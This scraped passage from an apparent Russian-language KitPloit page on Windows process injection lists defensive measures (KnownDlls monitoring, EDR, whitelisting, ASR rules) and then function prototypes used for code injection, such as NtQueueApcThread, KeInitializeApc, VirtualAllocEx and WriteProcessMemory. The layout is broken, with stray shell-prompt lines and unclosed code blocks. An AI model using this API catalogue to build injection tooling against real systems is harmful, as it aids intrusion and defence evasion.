  • Отслеживайте изменения кэша KnownDlls
  • Используйте EDR-решения с возможностями обнаружения отравления кэша KnownDlls
  • Применяйте включение в белый список и проверку подписи кода для DLL, находящихся в кэше KnownDlls

Дополнительные соображения по обнаружению и защите

  1. Реализуйте надежную стратегию включения приложений в белый список (Application Whitelisting), чтобы предотвратить запуск неавторизованных исполняемых файлов и DLL.
  2. Используйте Windows Defender Exploit Guard или аналогичные технологии для включения правил сокращения поверхности атаки (Attack Surface Reduction, ASR).

Read more

Скачать инструмент
root@kitploit:~
root@kitploit:~
  • NtQueueApcThread (недокументировано) ```c NTSTATUS NTAPI NtQueueApcThread( IN HANDLE ThreadHandle, IN PIO_APC_ROUTINE ApcRoutine, IN PVOID ApcRoutineContext OPTIONAL, IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, IN ULONG ApcReserved OPTIONAL );
    root@kitploit:~
  • RtlCreateUserThread (см. выше)
  • KeInitializeAPC (режим ядра, недокументированный) ```c VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
    root@kitploit:~
  • FindWindow (см. выше)
  • FindWindowEx (см. выше)
  • GetWindowThreadProcessId (см. выше)
  • OpenProcess (см. выше)
  • ReadProcessMemory (см. выше)
  • VirtualAllocEx (см. выше)
  • WriteProcessMemory (см. выше)
  • SetPropA ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~
  • PostMessage ```c BOOL PostMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~